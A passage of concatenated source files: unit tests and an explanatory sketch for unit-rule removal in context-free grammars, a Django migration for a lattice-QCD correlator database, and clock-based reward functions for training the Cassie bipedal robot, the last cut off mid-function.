self.assertIn(RuleNewSto2B, com.rules)
fromSto2B = list(filter(lambda x: hash(x) == hash(RuleNewSto2B), com.rules))[0]
self.assertTrue(isclass(fromSto2B))
self.assertTrue(issubclass(fromSto2B, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto2B.by_rules), 1)
self.assertEqual(fromSto2B.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto2B.end_rule.rule, ([B], [2, B]))
class RuleNewSto3S(Rule): rule = ([S], [3, S])
self.assertIn(RuleNewSto3S, com.rules)
fromSto3S = list(filter(lambda x: hash(x) == hash(RuleNewSto3S), com.rules))[0]
self.assertTrue(isclass(fromSto3S))
self.assertTrue(issubclass(fromSto3S, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto3S.by_rules), 1)
self.assertEqual(fromSto3S.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto3S.end_rule.rule, ([B], [3, S]))
class RuleNewSto3D(Rule): rule = ([S], [3, D])
self.assertIn(RuleNewSto3D, com.rules)
fromSto3D = list(filter(lambda x: hash(x) == hash(RuleNewSto3D), com.rules))[0]
self.assertTrue(isclass(fromSto3D))
self.assertTrue(issubclass(fromSto3D, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto3D.by_rules), 2)
self.assertEqual(fromSto3D.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto3D.by_rules[1].rule, ([B], [D]))
self.assertEqual(fromSto3D.end_rule.rule, ([D], [3, D]))
class RuleNewSto2(Rule): rule = ([S], [2])
self.assertIn(RuleNewSto2, com.rules)
fromSto2 = list(filter(lambda x: hash(x) == hash(RuleNewSto2), com.rules))[0]
self.assertTrue(isclass(fromSto2))
self.assertTrue(issubclass(fromSto2, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto2.by_rules), 2)
self.assertEqual(fromSto2.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto2.by_rules[1].rule, ([B], [D]))
self.assertEqual(fromSto2.end_rule.rule, ([D], [2]))
class RuleNewAto1C(Rule): rule = ([A], [1, C])
self.assertIn(RuleNewAto1C, com.rules)
fromAto1C = list(filter(lambda x: hash(x) == hash(RuleNewAto1C), com.rules))[0]
self.assertTrue(isclass(fromAto1C))
self.assertTrue(issubclass(fromAto1C, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromAto1C.by_rules), 1)
self.assertEqual(fromAto1C.by_rules[0].rule, ([A], [C]))
self.assertEqual(fromAto1C.end_rule.rule, ([C], [1, C]))
class RuleNewAto0(Rule): rule = ([A], [0])
self.assertIn(RuleNewAto0, com.rules)
fromAto0 = list(filter(lambda x: hash(x) == hash(RuleNewAto0), com.rules))[0]
self.assertTrue(isclass(fromAto0))
self.assertTrue(issubclass(fromAto0, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromAto0.by_rules), 1)
self.assertEqual(fromAto0.by_rules[0].rule, ([A], [C]))
self.assertEqual(fromAto0.end_rule.rule, ([C], [0]))
class RuleNewBto3D(Rule): rule = ([B], [3, D])
self.assertIn(RuleNewBto3D, com.rules)
fromBto3D = list(filter(lambda x: hash(x) == hash(RuleNewBto3D), com.rules))[0]
self.assertTrue(isclass(fromBto3D))
self.assertTrue(issubclass(fromBto3D, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromBto3D.by_rules), 1)
self.assertEqual(fromBto3D.by_rules[0].rule, ([B], [D]))
self.assertEqual(fromBto3D.end_rule.rule, ([D], [3, D]))
class RuleNewBto2(Rule): rule = ([B], [2])
self.assertIn(RuleNewBto2, com.rules)
fromBto2 = list(filter(lambda x: hash(x) == hash(RuleNewBto2), com.rules))[0]
self.assertTrue(isclass(fromBto2))
self.assertTrue(issubclass(fromBto2, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromBto2.by_rules), 1)
self.assertEqual(fromBto2.by_rules[0].rule, ([B], [D]))
self.assertEqual(fromBto2.end_rule.rule, ([D], [2]))
def test_simpleTestShouldNotChange(self):
g = Grammar(terminals=[0,1,2,3],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
ContextFree.remove_unit_rules(g)
# Removed
class RuleStoA(Rule): rule = ([S], [A])
self.assertIn(RuleStoA, g.rules)
class RuleStoB(Rule): rule = ([S], [B])
self.assertIn(RuleStoB, g.rules)
class RuleAtoC(Rule): rule = ([A], [C])
self.assertIn(RuleAtoC, g.rules)
class RuleBtoD(Rule): rule = ([B], [D])
self.assertIn(RuleBtoD, g.rules)
# Old rules
class RuleNewAto0A(Rule): rule = ([A], [0, A])
self.assertIn(RuleNewAto0A, g.rules)
class RuleNewAto1S(Rule): rule = ([A], [1, S])
self.assertIn(RuleNewAto1S, g.rules)
class RuleNewBto2B(Rule): rule = ([B], [2, B])
self.assertIn(RuleNewBto2B, g.rules)
class RuleNewBto3S(Rule): rule = ([B], [3, S])
self.assertIn(RuleNewBto3S, g.rules)
class RuleNewCto1C(Rule): rule = ([C], [1, C])
self.assertIn(RuleNewCto1C, g.rules)
class RuleNewCto0(Rule): rule = ([C], [0])
self.assertIn(RuleNewCto0, g.rules)
class RuleNewDto3D(Rule): rule = ([D], [3, D])
self.assertIn(RuleNewDto3D, g.rules)
class RuleNewDto2(Rule): rule = ([D], [2])
self.assertIn(RuleNewDto2, g.rules)
# New rules
class RuleNewSto0A(Rule): rule = ([S], [0, A])
self.assertNotIn(RuleNewSto0A, g.rules)
class RuleNewSto1S(Rule): rule = ([S], [1, S])
self.assertNotIn(RuleNewSto1S, g.rules)
class RuleNewSto1C(Rule): rule = ([S], [1, C])
self.assertNotIn(RuleNewSto1C, g.rules)
class RuleNewSto0(Rule): rule = ([S], [0])
self.assertNotIn(RuleNewSto0, g.rules)
class RuleNewSto2B(Rule): rule = ([S], [2, B])
self.assertNotIn(RuleNewSto2B, g.rules)
class RuleNewSto3S(Rule): rule = ([S], [3, S])
self.assertNotIn(RuleNewSto3S, g.rules)
class RuleNewSto3D(Rule): rule = ([S], [3, D])
self.assertNotIn(RuleNewSto3D, g.rules)
class RuleNewSto2(Rule): rule = ([S], [2])
self.assertNotIn(RuleNewSto2, g.rules)
class RuleNewAto1C(Rule): rule = ([A], [1, C])
self.assertNotIn(RuleNewAto1C, g.rules)
class RuleNewAto0(Rule): rule = ([A], [0])
self.assertNotIn(RuleNewAto0, g.rules)
class RuleNewBto3D(Rule): rule = ([B], [3, D])
self.assertNotIn(RuleNewBto3D, g.rules)
class RuleNewBto2(Rule): rule = ([B], [2])
self.assertNotIn(RuleNewBto2, g.rules)
def test_simpleTestShouldChange(self):
g = Grammar(terminals=[0,1,2,3],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
ContextFree.remove_unit_rules(g, True)
# Removed
class RuleStoA(Rule): rule = ([S], [A])
self.assertNotIn(RuleStoA, g.rules)
class RuleStoB(Rule): rule = ([S], [B])
self.assertNotIn(RuleStoB, g.rules)
class RuleAtoC(Rule): rule = ([A], [C])
self.assertNotIn(RuleAtoC, g.rules)
class RuleBtoD(Rule): rule = ([B], [D])
self.assertNotIn(RuleBtoD, g.rules)
# Old rules
class RuleNewAto0A(Rule): rule = ([A], [0, A])
self.assertIn(RuleNewAto0A, g.rules)
class RuleNewAto1S(Rule): rule = ([A], [1, S])
self.assertIn(RuleNewAto1S, g.rules)
class RuleNewBto2B(Rule): rule = ([B], [2, B])
self.assertIn(RuleNewBto2B, g.rules)
class RuleNewBto3S(Rule): rule = ([B], [3, S])
self.assertIn(RuleNewBto3S, g.rules)
class RuleNewCto1C(Rule): rule = ([C], [1, C])
self.assertIn(RuleNewCto1C, g.rules)
class RuleNewCto0(Rule): rule = ([C], [0])
self.assertIn(RuleNewCto0, g.rules)
class RuleNewDto3D(Rule): rule = ([D], [3, D])
self.assertIn(RuleNewDto3D, g.rules)
class RuleNewDto2(Rule): rule = ([D], [2])
self.assertIn(RuleNewDto2, g.rules)
# New rules
class RuleNewSto0A(Rule): rule = ([S], [0, A])
self.assertIn(RuleNewSto0A, g.rules)
fromSto0A = list(filter(lambda x: hash(x) == hash(RuleNewSto0A), g.rules))[0]
self.assertTrue(isclass(fromSto0A))
self.assertTrue(issubclass(fromSto0A, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto0A.by_rules), 1)
self.assertEqual(fromSto0A.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto0A.end_rule.rule, ([A], [0, A]))
class RuleNewSto1S(Rule): rule = ([S], [1, S])
self.assertIn(RuleNewSto1S, g.rules)
fromSto1S = list(filter(lambda x: hash(x) == hash(RuleNewSto1S), g.rules))[0]
self.assertTrue(isclass(fromSto1S))
self.assertTrue(issubclass(fromSto1S, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto1S.by_rules), 1)
self.assertEqual(fromSto1S.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto1S.end_rule.rule, ([A], [1, S]))
class RuleNewSto1C(Rule): rule = ([S], [1, C])
self.assertIn(RuleNewSto1C, g.rules)
fromSto1C = list(filter(lambda x: hash(x) == hash(RuleNewSto1C), g.rules))[0]
self.assertTrue(isclass(fromSto1C))
self.assertTrue(issubclass(fromSto1C, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto1C.by_rules), 2)
self.assertEqual(fromSto1C.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto1C.by_rules[1].rule, ([A], [C]))
self.assertEqual(fromSto1C.end_rule.rule, ([C], [1, C]))
class RuleNewSto0(Rule): rule = ([S], [0])
self.assertIn(RuleNewSto0, g.rules)
fromSto0 = list(filter(lambda x: hash(x) == hash(RuleNewSto0), g.rules))[0]
self.assertTrue(isclass(fromSto0))
self.assertTrue(issubclass(fromSto0, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto0.by_rules), 2)
self.assertEqual(fromSto0.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto0.by_rules[1].rule, ([A], [C]))
self.assertEqual(fromSto0.end_rule.rule, ([C], [0]))
class RuleNewSto2B(Rule): rule = ([S], [2, B])
self.assertIn(RuleNewSto2B, g.rules)
fromSto2B = list(filter(lambda x: hash(x) == hash(RuleNewSto2B), g.rules))[0]
self.assertTrue(isclass(fromSto2B))
self.assertTrue(issubclass(fromSto2B, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto2B.by_rules), 1)
self.assertEqual(fromSto2B.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto2B.end_rule.rule, ([B], [2, B]))
class RuleNewSto3S(Rule): rule = ([S], [3, S])
self.assertIn(RuleNewSto3S, g.rules)
fromSto3S = list(filter(lambda x: hash(x) == hash(RuleNewSto3S), g.rules))[0]
self.assertTrue(isclass(fromSto3S))
self.assertTrue(issubclass(fromSto3S, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto3S.by_rules), 1)
self.assertEqual(fromSto3S.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto3S.end_rule.rule, ([B], [3, S]))
class RuleNewSto3D(Rule): rule = ([S], [3, D])
self.assertIn(RuleNewSto3D, g.rules)
fromSto3D = list(filter(lambda x: hash(x) == hash(RuleNewSto3D), g.rules))[0]
self.assertTrue(isclass(fromSto3D))
self.assertTrue(issubclass(fromSto3D, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto3D.by_rules), 2)
self.assertEqual(fromSto3D.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto3D.by_rules[1].rule, ([B], [D]))
self.assertEqual(fromSto3D.end_rule.rule, ([D], [3, D]))
class RuleNewSto2(Rule): rule = ([S], [2])
self.assertIn(RuleNewSto2, g.rules)
fromSto2 = list(filter(lambda x: hash(x) == hash(RuleNewSto2), g.rules))[0]
self.assertTrue(isclass(fromSto2))
self.assertTrue(issubclass(fromSto2, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto2.by_rules), 2)
self.assertEqual(fromSto2.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto2.by_rules[1].rule, ([B], [D]))
self.assertEqual(fromSto2.end_rule.rule, ([D], [2]))
class RuleNewAto1C(Rule): rule = ([A], [1, C])
self.assertIn(RuleNewAto1C, g.rules)
fromAto1C = list(filter(lambda x: hash(x) == hash(RuleNewAto1C), g.rules))[0]
self.assertTrue(isclass(fromAto1C))
self.assertTrue(issubclass(fromAto1C, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromAto1C.by_rules), 1)
self.assertEqual(fromAto1C.by_rules[0].rule, ([A], [C]))
self.assertEqual(fromAto1C.end_rule.rule, ([C], [1, C]))
class RuleNewAto0(Rule): rule = ([A], [0])
self.assertIn(RuleNewAto0, g.rules)
fromAto0 = list(filter(lambda x: hash(x) == hash(RuleNewAto0), g.rules))[0]
self.assertTrue(isclass(fromAto0))
self.assertTrue(issubclass(fromAto0, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromAto0.by_rules), 1)
self.assertEqual(fromAto0.by_rules[0].rule, ([A], [C]))
self.assertEqual(fromAto0.end_rule.rule, ([C], [0]))
class RuleNewBto3D(Rule): rule = ([B], [3, D])
self.assertIn(RuleNewBto3D, g.rules)
fromBto3D = list(filter(lambda x: hash(x) == hash(RuleNewBto3D), g.rules))[0]
self.assertTrue(isclass(fromBto3D))
self.assertTrue(issubclass(fromBto3D, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromBto3D.by_rules), 1)
self.assertEqual(fromBto3D.by_rules[0].rule, ([B], [D]))
self.assertEqual(fromBto3D.end_rule.rule, ([D], [3, D]))
class RuleNewBto2(Rule): rule = ([B], [2])
self.assertIn(RuleNewBto2, g.rules)
fromBto2 = list(filter(lambda x: hash(x) == hash(RuleNewBto2), g.rules))[0]
self.assertTrue(isclass(fromBto2))
self.assertTrue(issubclass(fromBto2, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromBto2.by_rules), 1)
self.assertEqual(fromBto2.by_rules[0].rule, ([B], [D]))
self.assertEqual(fromBto2.end_rule.rule, ([D], [2]))
if __name__ == '__main__':
main()
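The assertions above exercise the standard unit-rule elimination construction: for every unit chain A =>* B and every non-unit rule B -> w, a combined rule A -> w is added (the `ReducedUnitRule` classes record the chain in `by_rules` and the terminal rule in `end_rule`). A minimal standalone sketch of that construction, independent of this project's `Rule`/`Grammar` classes (plain tuples instead of rule classes, no provenance tracking), might look like:

```python
def remove_unit_rules(rules, nonterminals):
    """Eliminate unit rules A -> B (a single nonterminal on the right).

    `rules` is a set of (lhs, rhs) pairs with rhs a tuple of symbols.
    Returns an equivalent rule set with no unit rules: for every unit
    chain A =>* B and non-unit rule B -> w, it contains A -> w.
    """
    def is_unit(rhs):
        return len(rhs) == 1 and rhs[0] in nonterminals

    # Step 1: transitive closure of unit derivations, seeded with (A, A).
    pairs = {(n, n) for n in nonterminals}
    changed = True
    while changed:
        changed = False
        for a, b in list(pairs):
            for lhs, rhs in rules:
                if lhs == b and is_unit(rhs) and (a, rhs[0]) not in pairs:
                    pairs.add((a, rhs[0]))
                    changed = True

    # Step 2: re-point every non-unit rule of B at each A with A =>* B.
    return {(a, rhs) for a, b in pairs
            for lhs, rhs in rules if lhs == b and not is_unit(rhs)}

# The grammar from the tests above: S -> A | B, A -> C | 0A | 1S, etc.
grammar = {("S", ("A",)), ("S", ("B",)), ("A", ("C",)), ("B", ("D",)),
           ("A", ("0", "A")), ("A", ("1", "S")), ("B", ("2", "B")),
           ("B", ("3", "S")), ("C", ("1", "C")), ("C", ("0",)),
           ("D", ("3", "D")), ("D", ("2",))}
reduced = remove_unit_rules(grammar, {"S", "A", "B", "C", "D"})
```

On this grammar the sketch yields exactly the rule set the assertions check: the unit rules disappear and S inherits, for example, S -> 0A and S -> 2.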
# lattedb/correlator/migrations/0003_auto_20191119_2343.py
# Repo: callat-qcd/lattedb (BSD-3-Clause)

# Generated by Django 2.2.7 on 2019-11-19 23:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('correlator', '0002_auto_20191107_0016'),
]
operations = [
migrations.AlterField(
model_name='baryon2pt',
name='propagator0',
field=models.ForeignKey(help_text='Foreign Key to first \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryon2pt',
name='propagator1',
field=models.ForeignKey(help_text='Foreign Key to second \\(\\texttt{propagator}\\), and must be \\(\\leq \\texttt{propagator0}\\) (also Foreign Key)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryon2pt',
name='propagator2',
field=models.ForeignKey(help_text='Foreign Key to third \\(\\texttt{propagator}\\), and must be \\(\\leq \\texttt{propagator1}\\) (also Foreign Key)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryon2pt',
name='sinkwave',
field=models.ForeignKey(help_text='Foreign Key to sink interpolating operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='baryon2pt',
name='sourcewave',
field=models.ForeignKey(help_text='Foreign Key to source interpolating operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='fhpropagator',
field=models.ForeignKey(help_text='Foreign Key pointing to Feynman-Hellmann \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='propagator0',
field=models.ForeignKey(help_text='Foreign Key pointing to spectator \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='propagator1',
field=models.ForeignKey(help_text='Foreign Key pointing to spectator \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='sinkwave',
field=models.ForeignKey(help_text='Foreign Key pointing to sink operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='baryonfh3pt',
name='sourcewave',
field=models.ForeignKey(help_text='Foreign Key pointing to source operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='baryonseq3pt',
name='current',
field=models.ForeignKey(help_text='Foreign Key to current interaction operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, to='current.Current'),
),
migrations.AlterField(
model_name='baryonseq3pt',
name='propagator',
field=models.ForeignKey(help_text='Foreign Key pointing to daughter quark \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonseq3pt',
name='seqpropagator',
field=models.ForeignKey(help_text='Foreign Key pointing to sequential \\(\\texttt{propagator}\\) (2 spectator quarks + 1 daughter)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='baryonseq3pt',
name='sourcewave',
field=models.ForeignKey(help_text='Foreign Key pointing to source operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='dwftuning',
name='propagator',
field=models.ForeignKey(help_text='Foreign Key to \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='dwftuning',
name='sink5',
field=models.BooleanField(help_text='Is the sink on the domain wall?'),
),
migrations.AlterField(
model_name='dwftuning',
name='wave',
field=models.ForeignKey(help_text='Foreign Key to source spin color space \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='meson2pt',
name='propagator0',
field=models.ForeignKey(help_text='Foreign Key to first \\(\\texttt{propagator}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='meson2pt',
name='propagator1',
field=models.ForeignKey(help_text='Foreign Key to second \\(\\texttt{propagator}\\), and must be \\(\\leq \\texttt{propagator0}\\) (also Foreign Key)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='propagator.Propagator'),
),
migrations.AlterField(
model_name='meson2pt',
name='sinkwave',
field=models.ForeignKey(help_text='Foreign Key to sink interpolating operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
migrations.AlterField(
model_name='meson2pt',
name='sourcewave',
field=models.ForeignKey(help_text='Foreign Key to source interpolating operator \\(\\texttt{wavefunction}\\)', on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wavefunction.SCSWaveFunction'),
),
]
# cassie/misc/rewards/clock_rewards.py
# Repo: WooQi57/cassie-run (MIT)

import numpy as np
import pickle
from cassie.trajectory.aslip_trajectory import get_ref_aslip_ext_state, get_ref_aslip_unaltered_state, get_ref_aslip_global_state
def clock_reward(self, action):
qpos = np.copy(self.sim.qpos())
qvel = np.copy(self.sim.qvel())
# These used for normalizing the foot forces and velocities
desired_max_foot_frc = 250
desired_max_foot_vel = 2.0
orient_targ = np.array([1, 0, 0, 0])
# state info
com_vel = qvel[0] # only care about x velocity
# put a cap on the frc and vel so as to prevent the policy from learning to maximize them during phase.
normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
com_orient_error = 0
foot_orient_error = 0
com_vel_error = 0
straight_diff = 0
foot_vel_error = 0
foot_frc_error = 0
# com orient error
com_orient_error += 10 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
# foot orient error
foot_orient_error += 10 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
# com vel error
com_vel_error += np.linalg.norm(com_vel - self.speed)
# pelvis motion penalty : straight_diff, height deadzone, pelvis acceleration penalty
straight_diff = np.abs(qpos[1]) # straight difference penalty
if straight_diff < 0.05:
straight_diff = 0
height_diff = np.abs(qpos[2] - 0.9) # height deadzone is range from 0.05 to 0.2 meters depending on speed
deadzone_size = 0.05 + 0.05 * self.speed
if height_diff < deadzone_size:
height_diff = 0
pelvis_acc = 0.25 * (np.abs(self.cassie_state.pelvis.rotationalVelocity[:]).sum() + np.abs(self.cassie_state.pelvis.translationalAcceleration[:]).sum())
pelvis_motion = straight_diff + height_diff + pelvis_acc
# force/vel clock errors
# These values represent if we want to allow foot foot forces / vels (1 -> good if forces/vels exist), or (-1 -> bad if forces/vels exist)
left_frc_clock = self.left_clock[0](self.phase)
right_frc_clock = self.right_clock[0](self.phase)
left_vel_clock = self.left_clock[1](self.phase)
right_vel_clock = self.right_clock[1](self.phase)
# scaled force/vel reward
# left_frc_score = np.tanh(left_frc_clock * normed_left_frc)
# left_vel_score = np.tanh(left_vel_clock * normed_left_vel)
# right_frc_score = np.tanh(right_frc_clock * normed_right_frc)
# right_vel_score = np.tanh(right_vel_clock * normed_right_vel)
left_frc_score = np.tan(np.pi/4 * left_frc_clock * normed_left_frc)
left_vel_score = np.tan(np.pi/4 * left_vel_clock * normed_left_vel)
right_frc_score = np.tan(np.pi/4 * right_frc_clock * normed_right_frc)
right_vel_score = np.tan(np.pi/4 * right_vel_clock * normed_right_vel)
foot_frc_score = left_frc_score + right_frc_score
foot_vel_score = left_vel_score + right_vel_score
# hip roll velocity penalty
hip_roll_penalty = np.abs(qvel[6]) + np.abs(qvel[13])
# torque cost
torque = np.asarray(self.cassie_state.motor.torque[:])
torque_penalty = 0.25 * (sum(np.abs(self.prev_torque - torque)) / len(torque))
# action cost
action_penalty = 5 * sum(np.abs(self.prev_action - action)) / len(action)
reward = 0.200 * foot_frc_score + \
0.200 * foot_vel_score + \
0.200 * np.exp(-(com_orient_error + foot_orient_error)) + \
0.150 * np.exp(-pelvis_motion) + \
0.150 * np.exp(-com_vel_error) + \
0.050 * np.exp(-hip_roll_penalty) + \
0.025 * np.exp(-torque_penalty) + \
0.025 * np.exp(-action_penalty)
if self.debug:
print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_frc_score: {:.2f}\t t_frc_score: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_score, foot_frc_score))
print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_vel_score: {:.2f}\t t_vel_score: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_score, foot_vel_score))
# print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
# print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))\
print(
f"reward: \t{reward:.2f} / 1.000\n"
f"foot_frc:\t{0.200 * foot_frc_score:.2f} / +-0.200\n"
f"foot_vel:\t{0.200 * foot_vel_score:.2f} / +-0.200\n"
f"orient: \t{0.200 * np.exp(-(com_orient_error + foot_orient_error)):.2f} / 0.200\n"
f"pelvis: \t{0.150 * np.exp(-pelvis_motion):.2f} / 0.150\n"
f"com_vel: \t{0.150 * np.exp(-com_vel_error):.2f} / 0.150\n"
f"hip_roll:\t{0.050 * np.exp(-hip_roll_penalty):.2f} / 0.050\n"
f"torque: \t{0.025 * np.exp(-torque_penalty):.2f} / 0.025\n"
f"action: \t{0.025 * np.exp(-action_penalty):.2f} / 0.025"
)
print("actual speed: {}\tcommanded speed: {}\n\n".format(qvel[0], self.speed))
return reward
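The `self.left_clock` / `self.right_clock` callables queried above are assumed to map phase to a value in roughly [-1, 1]: positive when foot force (index 0) or foot velocity (index 1) is rewarded at that phase, negative when it is penalized. The actual clocks are constructed elsewhere in this repo; a minimal hypothetical sketch of one such construction (a smooth cosine clock, feet offset by half a cycle, names and cycle length are assumptions) might be:

```python
import math

def make_clocks(cycle_len, offset=0.0):
    """Build (force_clock, velocity_clock) callables over phase.

    Each returns a value in [-1, 1]: +1 means the quantity is rewarded
    at that phase, -1 means it is penalized.
    """
    def frc_clock(phase):
        t = (phase / cycle_len + offset) % 1.0
        return math.cos(2 * math.pi * t)   # stance (+1) at cycle start, swing (-1) mid-cycle
    def vel_clock(phase):
        return -frc_clock(phase)           # the foot may move exactly when it should be unloaded
    return frc_clock, vel_clock

# Feet are offset by half a cycle so one is in stance while the other swings.
left_clock = make_clocks(cycle_len=28)
right_clock = make_clocks(cycle_len=28, offset=0.5)
```

With this construction `left_clock[0](self.phase)` and friends plug directly into the scoring expressions above.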
"""
Designed to speed up early parts of training, prevent bobbing in place local minima.
Changes to clock_reward:
- no pelvis acc
- much less weighting / less strict on torque, action, hip roll penalty, foot orient, com orient
- much more weighting on force/vel clock, com vel. Higher range on normalization of foot force/vel
"""
def early_clock_reward(self, action):
qpos = np.copy(self.sim.qpos())
qvel = np.copy(self.sim.qvel())
# These used for normalizing the foot forces and velocities
desired_max_foot_frc = 350
desired_max_foot_vel = 3.0
orient_targ = np.array([1, 0, 0, 0])
# state info
com_vel = qvel[0] # only care about x velocity
# put a cap on the frc and vel so as to prevent the policy from learning to maximize them during phase.
normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
com_orient_error = 0
foot_orient_error = 0
com_vel_error = 0
straight_diff = 0
foot_vel_error = 0
foot_frc_error = 0
# com orient error
com_orient_error += 1 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
# foot orient error
foot_orient_error += 1 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
# com vel error
com_vel_error += np.linalg.norm(self.speed - com_vel)
# pelvis motion penalty : straight_diff, height deadzone, pelvis acceleration penalty
straight_diff = np.abs(qpos[1]) # straight difference penalty
if straight_diff < 0.05:
straight_diff = 0
height_diff = np.abs(qpos[2] - 0.9) # height deadzone is range from 0.05 to 0.2 meters depending on speed
deadzone_size = 0.05 + 0.05 * self.speed
if height_diff < deadzone_size:
height_diff = 0
# pelvis_acc = 0.25 * (np.abs(self.cassie_state.pelvis.rotationalVelocity[:]).sum() + np.abs(self.cassie_state.pelvis.translationalAcceleration[:]).sum())
pelvis_motion = straight_diff + height_diff
# force/vel clock errors
# These values represent if we want to allow foot foot forces / vels (1 -> good if forces/vels exist), or (-1 -> bad if forces/vels exist)
left_frc_clock = self.left_clock[0](self.phase)
right_frc_clock = self.right_clock[0](self.phase)
left_vel_clock = self.left_clock[1](self.phase)
right_vel_clock = self.right_clock[1](self.phase)
# scaled force/vel reward
left_frc_score = np.tanh(left_frc_clock * normed_left_frc)
left_vel_score = np.tanh(left_vel_clock * normed_left_vel)
right_frc_score = np.tanh(right_frc_clock * normed_right_frc)
right_vel_score = np.tanh(right_vel_clock * normed_right_vel)
# left_frc_score = np.tan(np.pi/4 * left_frc_clock * normed_left_frc)
